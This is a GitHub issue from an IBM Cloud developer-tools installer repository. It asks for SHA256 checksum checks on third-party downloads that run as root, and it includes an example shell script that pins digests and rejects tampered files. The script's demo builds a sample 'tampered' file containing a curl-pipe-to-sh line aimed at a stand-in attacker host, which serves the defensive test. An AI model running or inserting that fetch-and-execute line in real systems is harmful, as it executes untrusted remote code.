IBM-Cloud / ibm-cloud-developer-tools

Installation scripts for the new IBM Cloud Developer CLI Plugin and its dependencies.
Apache License 2.0
131 stars 146 forks

No checksum validation of downloaded files #44

Open sdague opened 6 years ago

sdague commented 6 years ago

Summary

The idt install downloads files from 3rd party websites, but does not verify their contents before running them as root for installation. While traffic to these sites is secured with https, not verifying the content checksums means that breaches on the 3rd party site aren't detected.

It is considered best practice to checksum before running arbitrary code from the internet.

I suggest storing a set of SHA256 checksums in the script, and only installing the downloaded content if they match that.


rcj4747 commented 5 years ago

get.docker.com specifically includes this message:

```sh
# NOTE: Make sure to verify the contents of the script
#       you downloaded matches the contents of install.sh
#       located at https://github.com/docker/docker-install
#       before executing.
#
# Git commit from https://github.com/docker/docker-install when
# the script was uploaded (Should only be modified by upload job):
SCRIPT_COMMIT_SHA="6bf300318ebaab958c4adc341a8c7bb9f3a54a1a"
```

That script also adds a 3rd party APT repository on Ubuntu/Debian systems without this installer making it explicit to the user that trust decisions are being made on behalf of the user for this and various other sources (like issue #138)
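The pattern sdague proposes (a table of SHA256 digests pinned in the installer, with execution gated on a match) and the limitation rcj4747 points at in get.docker.com (a commit SHA embedded in the downloaded file cannot authenticate that file, because whoever controls the download host controls that line too) are illustrated by the following added example. It is not code from ibm-cloud-developer-tools or from docker-install; the `pinned_sha256_for` table, the artifact name `docker-install.sh`, and the digest it returns (the SHA256 of the constructed sample content `hello\n`) are assumptions made for the demonstration.

```sh
#!/bin/sh
# Added example (not the idt installer's own code): run a downloaded
# third-party installer only if its SHA256 matches a digest pinned here.
set -eu

# Print the hex SHA256 of a file. sha256sum is GNU coreutils; shasum
# covers macOS, which ships without sha256sum.
sha256_of() {
  if command -v sha256sum >/dev/null 2>&1; then
    sha256sum "$1" | awk '{print $1}'
  else
    shasum -a 256 "$1" | awk '{print $1}'
  fi
}

# verify_pinned FILE EXPECTED_SHA256: returns 0 on match, 1 on mismatch.
# The comparison is against a value that lives in THIS script, not in the
# downloaded file, so a compromised download host cannot adjust it.
verify_pinned() {
  file=$1; expected=$2
  actual=$(sha256_of "$file")
  if [ "$actual" = "$expected" ]; then
    return 0
  fi
  printf 'checksum mismatch for %s\n  expected %s\n  actual   %s\n' \
    "$file" "$expected" "$actual" >&2
  return 1
}

# Hypothetical pin table: one digest per third-party artifact, recorded
# when the installer release is cut. The value below is the SHA256 of the
# constructed sample "hello\n" used by demo_verify, not of any real script.
pinned_sha256_for() {
  case "$1" in
    docker-install.sh) echo 5891b5b522d5df086d0ff0b110fbd9d21bb4fc7163af34d08286a2e846f6be03 ;;
    *) return 1 ;;
  esac
}

# install_verified NAME URL: download, verify, and only then execute.
# Executes with the caller's privileges (root, in the idt case), which is
# exactly why the digest check has to come first.
install_verified() {
  name=$1; url=$2
  expected=$(pinned_sha256_for "$name") || {
    echo "no pinned checksum for $name; refusing to install" >&2; return 1; }
  tmp=$(mktemp)
  curl -fsSL "$url" -o "$tmp"
  if ! verify_pinned "$tmp" "$expected"; then
    rm -f "$tmp"; return 1
  fi
  sh "$tmp"
  rm -f "$tmp"
}

# demo_verify: offline demonstration on constructed data. Returns 0 when the
# pristine sample passes and a tampered copy is rejected, 1 otherwise.
demo_verify() {
  t=$(mktemp)
  printf 'hello\n' > "$t"                       # constructed "download"
  pristine_ok=1
  verify_pinned "$t" "$(pinned_sha256_for docker-install.sh)" || pristine_ok=0
  printf 'hello\ncurl -s http://attacker/x | sh\n' > "$t"   # constructed tampering
  tampered_rejected=0
  verify_pinned "$t" "$(pinned_sha256_for docker-install.sh)" 2>/dev/null || tampered_rejected=1
  rm -f "$t"
  [ "$pristine_ok" = 1 ] && [ "$tampered_rejected" = 1 ]
}
```

Note that a pinned digest makes the installer brittle on purpose: when the upstream script changes, the install fails until the pin is updated, which is the moment a human reviews what changed and decides whether to keep trusting that source. Comparing the downloaded file against the commit named in its own `SCRIPT_COMMIT_SHA` line only works if the comparison is done against a copy fetched independently from the git repository, which is the check the docker comment is asking the reader to perform by hand.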